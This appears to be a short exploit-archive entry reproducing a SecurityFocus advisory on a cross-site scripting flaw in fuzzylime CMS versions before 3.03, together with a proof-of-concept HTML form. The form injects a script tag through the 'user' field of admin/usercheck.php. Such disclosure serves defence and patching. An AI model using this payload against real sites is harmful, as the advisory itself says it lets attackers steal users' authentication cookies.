9 lines
No EOL
723 B
HTML
9 lines
No EOL
723 B
HTML
source: https://www.securityfocus.com/bid/31306/info
|
|
|
|
fuzzylime (cms) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected site. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
|
|
|
|
Versions prior to fuzzylime (cms) 3.03 are vulnerable.
|
|
|
|
<form method="post" action="http://www.example.com/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> |